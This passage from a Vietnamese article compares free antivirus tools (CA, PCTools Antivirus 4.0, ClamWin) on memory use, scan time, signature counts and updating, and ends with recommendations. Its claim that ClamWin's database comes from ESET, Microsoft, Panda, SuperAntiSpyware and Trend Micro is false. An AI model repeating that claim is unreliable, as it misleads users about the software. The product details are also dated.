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Để quét với CA, bạn chuyển qua thẻ Virus Scan rồi chọn một kiểu quét lập tức CA sẽ bắt đầu quét. Khi quét dùng khoảng 50 MB RAM (khi chạy nền dùng khoảng 30 MB) và tốn mất 26 phút 5 giây để quét toàn bộ ổ C.- CA chỉ hỗ trợ cho bạn cập nhật trực tuyến mà thôi, vì vậy nếu nhà không có Internet thì bạn không nên dùng CA. CA sẽ tự động thông báo cập nhật khi có CSDL mới hoặc bạn tự cập nhật bằng cách bấm vào nút Update Now ở giao diện chính.

5/ PCTools Antivirus 4.0 (PCA) 
Dung lượng 19.77 MB, tải tại http://www.pctools.com/mirror/avinstall.exe.

PCA có CSDL khoảng 510000 mẫu nhận dạng virus và có khả năng bảo vệ máy tính khỏi virus, trojan, worm theo thời gian thực và quét các email ra vào máy tính.

Khi chạy nền, PAC chỉ sử dụng 10 MB RAM mà thôi và khi quét thì dùng 20 MB RAM và mất khoảng 10 phút để quét toàn bộ ổ C. Ngoài ra, PAC có khả năng tìm diệt các loại virus trốn trong boot sector của ổ cứng và tính năng Intelli-Scan có cơ chế quét thông minh tập trung vào những nơi virus thường trú ẩn.
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PCA cũng chỉ có khả năng tự động cập nhật trực tuyến mà không thể cập nhật offline cho máy không có mạng. Khi tính năng Smart Update (tự cập nhật) bật lên, bạn hãy bấm Next rồi chọn các CSDL cung cấp rồi bấm Next để cập nhật.
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6/ ClamWin Antivirus 0.93 (CWA) 
Dung lượng 19.5MB, tải tại http://www.clamwin.com/content/view/18/46/ (bản cài đặt) 
Dung lượng 5.9MB http://portableapps.com/apps/utilities/clamwin_portable (bản Portable)

CWA là một ứng dụng quét virus nguồn mở khá được ưa chuộng hiện nay. CSDL của CWA được lấy từ các dịch vụ uy tín của ESET Nod32, Microsoft Live Onecare, Panda Acive Scan, SuperAntiSpyware và TrendMicro Housecall nên bạn hoàn toàn có thể yên tâm về chất lượng quét. Mặc dù có cơ sở nhận dạng virus tương đối lớn là 290000 mẫu nhưng CWA chỉ có một tính năng là quét virus mà thôi chứ không thể bảo vệ máy tính. Với bản Portable, CWA rất phù hợp cho những ai hay dùng USB để chuyển dữ liệu giữa nhiều máy tính.

CWA có giao diện thực sự đơn giản, để quét bạn chỉ cần chọn nơi cần quét (giữ Shift để chọn nhiều mục) rồi bấm nút Scan để quét. Khi quét CWA dùng khoảng 30 MB RAM và mất khoảng 26 phút để quét toàn ổ C.
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Để có cái nhìn tổng quát hơn về 6 chương trình này, bạn có thể xem bảng so sánh:
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Qua đó, bạn có thể thấy AVG phù hợp với các máy tính tương đối mạnh. Nhưng máy tính bạn tương đối yếu mà vẫn cần một phần mềm diệt virus mạnh thì hãy chọn AA. Hoặc nếu bạn cần một phần mềm có nhiều chức năng cao cấp thì hãy chọn aA. Nếu bạn có nhu phải cầu di chuyển nhiều và cần một chương trình quét mạnh để đem theo thì hãy chọn CWA Portable.

Ngoài ra, bạn cũng nên nghĩ đến một đại diện của Việt Nam là Bách Khoa Antivirus bản Home. http://www.bkav.com.vn/home/Download.aspx chương trình khá nhẹ nhàng nhưng cũng rất mạnh mẽ. Và có thể chạy chung với các trình diệt khác mà không gây xung đột nên bạn có thể cài mà không lo lắng.
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